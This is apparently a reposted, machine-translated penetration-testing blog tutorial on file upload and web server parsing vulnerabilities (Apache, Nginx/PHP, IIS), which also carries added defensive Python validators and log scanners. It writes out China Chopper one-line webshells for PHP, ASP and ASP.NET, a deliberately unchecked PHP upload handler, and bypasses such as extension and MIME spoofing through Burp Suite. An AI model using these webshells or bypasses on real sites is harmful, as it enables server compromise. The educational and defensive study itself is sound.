
Zhangxiaobai's way of penetration (V) -- detailed explanation of upload vulnerability and parsing vulnerability

2022-06-25 12:33:00 Litbai_ zhang

Preface

Web applications often provide file uploads, for example posting images on a BBS or publishing archives on a personal website. As long as a web application lets users upload files, a file upload vulnerability may exist.
Compared with SQL injection, an upload vulnerability carries more risk: if a web application has one, an attacker can upload a webshell straight to the server.
So how do you confirm that a web application has an upload vulnerability? Take my CSDN blog as an example: it is written in PHP and allows avatar uploads, but it does not check the image format when the file is uploaded, so a user can upload any file at all. That is an upload vulnerability.

Parsing vulnerabilities

When an attacker exploits an upload vulnerability, it usually goes hand in hand with a parsing vulnerability in the web container. So let's look at parsing vulnerabilities first; that gives a deeper understanding of upload vulnerabilities and of how to defend against them.
Common web containers include IIS, Nginx, Apache and Tomcat. Here Apache is used as the example. (IIS 6.0 is also a classic example of a parsing vulnerability; readers can study it on their own. Xiaobai likes to work through one thing at a time and has not researched it much...)

Apache parsing vulnerability

Both Apache 1.x and Apache 2.x have a parsing vulnerability, but it differs from the IIS one. For example, the following is a typical Apache parsing vulnerability. (Stop staring at the picture, look at the URL...)
(Figure: parsing vulnerability)
As you can see, the file name in the URL in the image is 1.php.rar. Normally a file download prompt should pop up, but it does not; instead the page shows the output of phpinfo(). This is Apache's parsing vulnerability. The content of 1.php.rar is as follows:

<?php
	phpinfo();
?>

Apache follows one rule when parsing files: when it encounters an extension it does not recognise, it works from right to left until it finds an extension it does recognise; if it recognises none of them, it exposes the file's source. For example:

1.php.rar.xs.aa

Apache first examines the aa extension; if it does not recognise it, it examines xs, and so on until it reaches an extension it knows, which it then uses to parse the file.
PS: the extensions Apache recognises are listed in detail in the file conf/mime.types under the Apache installation directory, as shown in the figure below.
(Figure: file types listed in mime.types)
Some developers, when designing the upload feature, check whether the file name ends in a script extension such as php, asp, aspx, asa or cer and refuse the upload if it does. An attacker may then upload a file named like 1.php.rar to get past that check and, combined with the parsing vulnerability, obtain a webshell.
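As an added illustration (not code from the original post), the Python model below applies the right-to-left rule just described to a constructed handler table and flags stored upload names that the rule would hand to the PHP interpreter. The table, handler strings and file names are assumptions made for the example, not Apache's real configuration.

```python
from typing import List, Optional

# Constructed handler table for illustration. A real Apache builds this from
# conf/mime.types plus AddType/AddHandler directives in its configuration.
KNOWN_HANDLERS = {
    "php": "application/x-httpd-php",   # handed to the PHP module: executed
    "jpg": "image/jpeg",
    "png": "image/png",
    "txt": "text/plain",
    "html": "text/html",
}
SCRIPT_HANDLERS = {"application/x-httpd-php"}


def apache_resolve(filename: str) -> Optional[str]:
    """Model of the rule described above: walk the extensions from right to
    left and return the first one Apache recognises; None if it knows none."""
    exts = filename.split(".")[1:]          # everything after the base name
    for ext in reversed(exts):
        handler = KNOWN_HANDLERS.get(ext.lower())
        if handler is not None:
            return handler
    return None


def would_execute(filename: str) -> bool:
    """True when Apache would execute the file even though a check on the
    last extension alone (e.g. '.rar') would have let it through."""
    return apache_resolve(filename) in SCRIPT_HANDLERS


def flag_uploads(filenames: List[str]) -> List[str]:
    """Filter a list of stored upload names down to the ones that would run,
    e.g. when auditing an existing uploads directory."""
    return [f for f in filenames if would_execute(f)]


if __name__ == "__main__":
    # Constructed names: the first and third are the 1.php.rar pattern
    for name in flag_uploads(["1.php.rar", "photo.jpg", "notes.txt.php", "a.php.jpg"]):
        print("would be executed by the PHP handler:", name)
```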

Nginx parsing vulnerability (PHP CGI parsing vulnerability)

Nginx is a high-performance web server, usually used as the container for PHP. Two "parsing vulnerabilities" have also been disclosed in Nginx. For example, visiting

http://www.litbai.com/1.jpg/1.php

Here 1.php does not exist, yet 1.jpg is parsed as a PHP script; the problem lies in the trailing "1.php". This means an attacker can upload a legitimate-looking "image" (an image Trojan), then append "/xxx.php" to its URL to obtain a webshell on the site.
In May 2008 the well-known Chinese security team 80SEC discovered this vulnerability; the advisory URL is: http://www.80sec.com/nginx-securit-securit.html
Later it turned out that this is not unique to Nginx: the same kind of parsing vulnerability has frequently appeared in IIS 7.0, IIS 7.5, Lighttpd and other web containers.
Eventually people realised that this parsing vulnerability is really a flaw in PHP CGI. The PHP configuration file has a key option: cgi.fix_pathinfo.
In some versions this option is on by default. With it on, accessing a URL such as

http://www.litbai.com/x.txt/x.php

where x.php is a non-existent file, PHP walks backwards along the path looking for a file to parse, which produces the parsing vulnerability. So the vulnerability has little to do with Nginx itself, but because the Nginx and PHP combination so easily leads to it, the PHP CGI vulnerability is often thought of as the Nginx parsing vulnerability.
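The following is an added example (not from the original post): a small Python log scanner, run over constructed access-log lines, that flags requests of the 1.jpg/1.php shape described above. The log lines, addresses and paths are made up for the demonstration, and the set of "static" extensions is an assumption.

```python
import re
from typing import List

# Constructed sample access-log lines (common log format) for illustration.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Feb/2022:05:31:02 +0000] "GET /images/1.jpg HTTP/1.1" 200 5120
203.0.113.5 - - [20/Feb/2022:05:31:09 +0000] "GET /images/1.jpg/1.php HTTP/1.1" 200 318
203.0.113.7 - - [20/Feb/2022:05:32:11 +0000] "GET /uploads/x.txt/x.php?a=1 HTTP/1.1" 200 64
198.51.100.2 - - [20/Feb/2022:05:33:40 +0000] "GET /index.php/user/1 HTTP/1.1" 200 2048
198.51.100.2 - - [20/Feb/2022:05:34:01 +0000] "POST /upload.php HTTP/1.1" 200 10
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Extensions an upload directory legitimately serves (assumed for the example)
STATIC_EXT = {"jpg", "jpeg", "png", "gif", "bmp", "txt", "rar", "zip", "pdf"}


def is_pathinfo_abuse(target: str) -> bool:
    """True when a static-looking file segment is followed by a .php segment,
    e.g. /1.jpg/1.php, the shape the cgi.fix_pathinfo flaw is abused with.
    A /index.php/user/1 style URL (script first) is ordinary PATH_INFO use."""
    path = target.split("?", 1)[0]
    segments = [s for s in path.split("/") if s]
    for i, seg in enumerate(segments[:-1]):
        ext = seg.rsplit(".", 1)[-1].lower() if "." in seg else ""
        if ext in STATIC_EXT:
            for later in segments[i + 1:]:
                if later.lower().endswith(".php"):
                    return True
    return False


def scan_log(text: str) -> List[str]:
    """Return the request targets that look like PHP path-info abuse."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_pathinfo_abuse(m.group("target")):
            hits.append(m.group("target"))
    return hits


if __name__ == "__main__":
    for t in scan_log(SAMPLE_LOG):
        print("suspicious:", t)
```

Flagging is only detection; the root cause is removed by setting cgi.fix_pathinfo=0 in php.ini and having Nginx return 404 for scripts that do not exist on disk (try_files $uri =404) before handing the request to PHP.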

Bypass upload vulnerability

When programmers develop web applications, file uploads are usually involved, for example uploading documents for download or uploading pictures to improve the user experience. The basic upload flow is always the same: the client validates with JavaScript, and the server renames the file with a random number to avoid duplicate names.
Programmers can guard against upload vulnerabilities in the following two ways.

  • Client-side detection: the client checks the file with JavaScript before it is uploaded.
  • Server-side detection: the server-side script generally checks the file's MIME type and whether the extension is legal; some programmers even check whether malicious code is embedded in the file.

Before studying upload vulnerabilities, let's first look at two small tools: China Chopper (Chinese kitchen knife) and the one-line image Trojan.

China Chopper

This software is used to manage website files. It is very small and flexible: it only needs a short piece of code on the server to manage a website easily. China Chopper has become a standard tool for security researchers; its official website is: http://www,maicaidao.com
The server-side file the software needs contains only one line of code. Currently supported server-side scripts include PHP, ASP, ASP.NET and JSP, and sites secured with HTTPS are supported. The common code is as follows:
ASP:
<%eval request("Cknife")%>

ASP.NET:
<%@ Page Language="Jscript"%><%eval(Request.Item["Cknife"],"unsafe");%>

PHP:
<?php @eval($_POST['Cknife']);?>

Because the code is so short, hackers call it a one-line Trojan (a one-line backdoor).
Save <?php @eval($_POST['Cknife']);?> as shell.php, upload it to the PHP host's web space, and configure China Chopper to connect to it. See https://blog.csdn.net/Litbai_zhang/article/details/82984795 for details.

Upload checks generally come in two kinds: client-side detection and server-side detection.

Client detection

Many programmers rely only on JavaScript to reject illegal file uploads. This check does stop some ordinary users from uploading the wrong thing, but to a professional it is very low-level validation, and an attacker can break through client-side checks in many ways. Below is a very simple file upload example that uses JavaScript validation.
Upload.html checks the file extension with JavaScript; if the extension is not on the whitelist, the form is not submitted to the server. The code is as follows:

<html>
  <head>
    <title>Image upload</title>
    <script type="text/javascript">
    function checkFile()
    {
        var flag = false;                                  // flag: may the file be uploaded?
        var str = document.getElementById("file").value;   // get the file name
        str = str.substring(str.lastIndexOf('.') + 1);     // get the extension
        var arr = new Array('png', 'bmp', 'gif', 'jpg');   // extensions allowed for upload
        for (var i = 0; i < arr.length; i++)
        {
            if (str == arr[i])
            {
                flag = true;                               // loop to decide whether the file name is legal
            }
        }
        if (!flag)
        {
            alert('Illegal file!!');
        }
        return flag;
    }
    </script>
  </head>
  <body>
    <!-- "return checkFile()" is required: without "return" the form is submitted regardless of the check -->
    <form action="upload.php" method="post" onsubmit="return checkFile()" enctype="multipart/form-data">
      <input type="file" name="file" id="file" /><br/>
      <input type="submit" value="Submit" name="submit"/>
    </form>
  </body>
</html>

Upload.php receives the file; after receiving it, it renames the file and stores it in the current directory, as in the following code:

<?php
	if(isset($_POST["submit"]))
	{
		$name = $_FILES['file']['name'];                       // receive the file name
		$name = md5(date('Y-m-d H:i:s')).strrchr($name,".");   // rename the file, keeping the original extension (the extension itself is never checked)
		$size = $_FILES['file']['size'];                       // receive the file size
		$tmp  = $_FILES['file']['tmp_name'];                   // temporary path
		move_uploaded_file($tmp,$name);                        // move the temporary file into the current directory
		echo "File upload succeeded! path:".$name;
	}
?>

There are many ways to bypass client-side validation (i.e. front-end bypass). Xiaobai likes (it is all Xiaobai uses) Burp Suite to capture packets, a "man-in-the-middle" approach (another is to use a debugging tool such as Firebug to simply delete the client-side check; I stopped studying Firebug after it was discontinued). Burp Suite's approach is to let the JavaScript check run normally and then tamper at the HTTP layer during transmission. Briefly, the idea is: first rename the Trojan file to a normal image extension such as JPG, use Burp Suite to intercept the upload request, then change the JPG extension to PHP. That bypasses the client-side check.
One detail deserves attention: the HTTP protocol has a request header, Content-Length, giving the length of the entity body. If modifying the filename changes the length of the entity body, Content-Length must be modified to match. For example, if Content-Length is 200 and filename="xxxxx.jpg" in the file stream is changed to filename="1.php", the entity body is 4 characters shorter, so Content-Length must be changed to 196. If it is not modified, the upload may fail.
PS:
To emphasise: no client-side validation is secure. Client-side validation exists to catch user input errors and reduce server load; only server-side validation can really stop an attacker.

Server side detection

As developers' security awareness has improved, attacks on front-end checks have become rarer, and validation is usually done on the server side. There are many kinds of server-side validation, and since every programmer thinks differently, the filtering methods differ too, but they mainly cover: whitelist and blacklist extension filtering, file type detection, and file renaming. That seems watertight, but do not forget the parsing vulnerability: if developers do not take parsing into account, an upload vulnerability combined with a parsing vulnerability can bypass most upload checks.

1. Whitelist and blacklist validation

When a file is uploaded, most programmers check the file extension. There are usually two ways to validate extensions: a whitelist and a blacklist. (Two simple terms that need no explanation.)

  1. Suppose a blacklist is used. An attacker can look for extensions the developer forgot to put on it, such as cer.
  2. On Windows, if a file name ends with "." or a space, the system automatically removes the trailing "." or space. This can also be used to bypass blacklist validation: for example, upload a program with extension "asp." or "asp_" (the underscore here stands for a space); when the server receives the file name and writes the file, Windows removes the trailing dot or space automatically.
    From the above it is not hard to see that blacklist filtering alone cannot prevent upload vulnerabilities, because there are too many unknown risks that cannot be predicted.
  3. A whitelist defends better than a blacklist. For example: $WhiteList=array('rar','jpg','png','gif','mp4','doc'); after the file extension is obtained, it is compared against the extensions in the $WhiteList array one by one; if the extension matches, the program treats the file as legal, otherwise the upload is refused.
    Although whitelist filtering guards against unknown risks, one cannot rely on the whitelist alone, because it still does not fully prevent upload vulnerabilities. For example, on IIS 6.0 an attacker can rename the Trojan file to pentest.asp;1.jpg and upload it; the file passes validation as a jpg, but IIS executes pentest.asp;1.jpg as an ASP script, so the attacker bypasses the whitelist check and runs the Trojan.
    Therefore, a whitelist is only the first step in preventing upload vulnerabilities.

2. MIME validation

The MIME type determines how a file with a given extension is opened: when such a file is accessed, the browser automatically opens it with the designated application. For example, the MIME type of a GIF image is image/gif and that of a CSS file is text/css.
When capturing packets, the MIME type can generally be seen in the Content-Type attribute.

When a PHP file is uploaded (MIME value application/php), suppose the server only allows the image/jpeg type through; a direct upload will certainly fail. If the Content-Type in the HTTP request is changed to image/jpeg with Burp Suite, the upload passes the program's check.

3. Directory validation

When a file is uploaded, the program usually lets the user place it in a specified directory. To make the code more "robust", some web code does the following: if the specified directory exists, the file is written into it; if it does not exist, the directory is created first and the file is then written.
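As an added example (not the page's code, and in Python rather than the page's PHP), the validator below combines the server-side checks from this section: a whitelist applied to a single, normalised extension, rejection of the 1.php.rar, pentest.asp;1.jpg and trailing-dot names, a magic-byte check that ignores the client's Content-Type, and a random server-side name whose extension comes from the sniffed type. The whitelist, magic-byte table and sample inputs are constructed for the example.

```python
import secrets
from typing import Optional, Tuple

ALLOWED = {"jpg", "png", "gif"}   # extension whitelist (constructed for this example)

# Leading bytes of the allowed types. The extension must agree with the bytes;
# the client-supplied Content-Type header is reported but never trusted.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff_type(data: bytes) -> Optional[str]:
    """Identify the real file type from its leading bytes, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def normalize_name(name: str) -> str:
    """Keep only the base name and drop trailing dots/spaces, which Windows
    would strip after the check (the 'asp.' / 'asp ' trick from the text)."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return base.rstrip(". ")


def validate_upload(filename: str, content_type: str, data: bytes) -> Tuple[Optional[str], str]:
    """Return (safe_name, reason); safe_name is None when the upload is rejected.
    Rejects multiple extensions (1.php.rar), ';' in the name (pentest.asp;1.jpg),
    non-whitelisted extensions, and bodies whose bytes contradict the extension
    even when Content-Type was changed to image/jpeg."""
    base = normalize_name(filename)
    if ";" in base or base.count(".") != 1 or base.startswith("."):
        return None, "bad-name"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return None, "not-whitelisted"
    real = sniff_type(data)
    if real != ext:
        return None, f"content-mismatch (Content-Type={content_type}, bytes={real})"
    # Random server-side name; the extension comes from the sniffed type, not the client.
    return f"{secrets.token_hex(16)}.{real}", "ok"
```

The stored name never reuses any part of the client's name, so neither Apache's multi-extension rule nor a trailing "/x.php" on the URL has a script extension to work with.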

Text editor upload vulnerability

Xiaobai's ability is limited, and there are many text editors, such as CKEditor, Ewebeditor, UEditor, KindEditor and XHeditor, none of which I have studied in depth for now. Put simply, these editors offer very similar functions, such as image upload, video upload and remote download; this kind of text editor is also called a rich text editor. Using such an editor shortens development time but adds many security risks. For example, if 100,000 websites use CKEditor and CKEditor has a getshell vulnerability, all 100,000 websites are affected.


Copyright notice
This article was written by Litbai_ zhang; please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/02/202202200531021701.html
